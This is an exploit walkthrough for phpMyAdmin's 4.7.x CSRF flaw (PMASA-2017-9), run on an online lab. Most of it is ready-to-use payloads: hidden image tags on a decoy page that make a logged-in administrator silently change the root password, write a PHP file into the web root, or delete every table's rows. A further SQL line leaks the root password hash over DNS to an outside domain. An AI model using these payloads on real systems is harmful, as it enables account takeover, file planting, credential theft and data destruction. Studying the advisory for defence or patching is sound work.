A new Critical CSRF Vulnerability discovered in widely used phpMyAdmin open source admin tool allows an attacker perform harmful database operation such as DROP TABLE, MODIFY PASSWORD.
1 phpMyAmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9)
phpMyAdmin is a well-known MySQL/MariaDB online management tool, phpMyAdmin team released the version 4.7.7 that addresses the CSRF vulnerability found by Barot. (PMASA-2017-9). The vulnerability allows an attacker to execute an arbitrary SQL statement silently by inducing an administrator to access malicious pages.
In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate the exploit of this vulnerability.
VulnSpy's online phpMyAdmin environment address: https://www.vulnspy.com/?u=pmasa-2017-9
2 Exploit CSRF - Modifying the password of current user
Change the current user password to www.vulnspy.com
, SQL command:
SET passsword=PASSWORD('www.vulnspy.com');
Exploit Demonstration
2.1 Log in to phpMyAdmin
Username: root Password: toor
2.2 Create a page with malicious code.
Filename: 2.payload.html
<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />
2.3 Open the file 2.payload.html in browser
Go back to phpMyAdmin, you'll find that the account has been loged out automatically, and the password of root have been changed.
2.4 Login successfully with the password www.vulnspy.com
3 Exploit CSRF - Arbitrary File Write
Write the code <?php phpinfo();?>
to the file /var/www/html/test.php
, SQL command:
select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';
Exploit Demonstration
3.1 Payload
<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />
3.2 Open the file contain the payload in browser
3.3 Visit test.php
4 Exploit CSRF - Data Retrieval over DNS
Steal the password hash of root, SQL command:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.vulnspy.com\\test'));
Fetch the current database name:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.vulnspy.com\\test'));
VSPlate not supports this exploit
5 Exploit CSRF - Empty All Rows From All Tables
Empty all rows from all tables, SQL command:
DROP PROCEDURE IF EXISTS EMPT;
DELIMITER $$
CREATE PROCEDURE EMPT()
BEGIN
DECLARE i INT;
SET i = 0;
WHILE i < 100 DO
SET @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT i,1);
PREPARE STMT FROM @del;
EXECUTE STMT;
SET i = i +1;
END WHILE;
END $$
DELIMITER ;
CALL EMPT();
Exploit Demonstration
5.1 Payload
<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A" style="display:none;" />
5.2 Open the file contain the payload in browser
5.3 Go back to phpMyAdmin
You'll find the data in database vulnspy_tables
and vulnspy_test
have been deleted.
GitHub Source
https://github.com/vulnspy/PMASA-2017-9
Reference
PMASA-2017-9 - https://www.phpmyadmin.net/security/PMASA-2017-9/
CSRF Vulnerability in phpMyAdmin allows attackers to perform DROP TABLE with a single click! - https://securityaffairs.co/wordpress/67243/hacking/phpmyadmin-csrf-vulnerability.html
phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9) Exploit - http://blog.vulnspy.com/2018/06/12/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-PMASA-2017-9-exploit/
phpMyAdmin 4.7.x CSRF 漏洞利用 - http://blog.vulnspy.com/2018/06/10/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-exploit/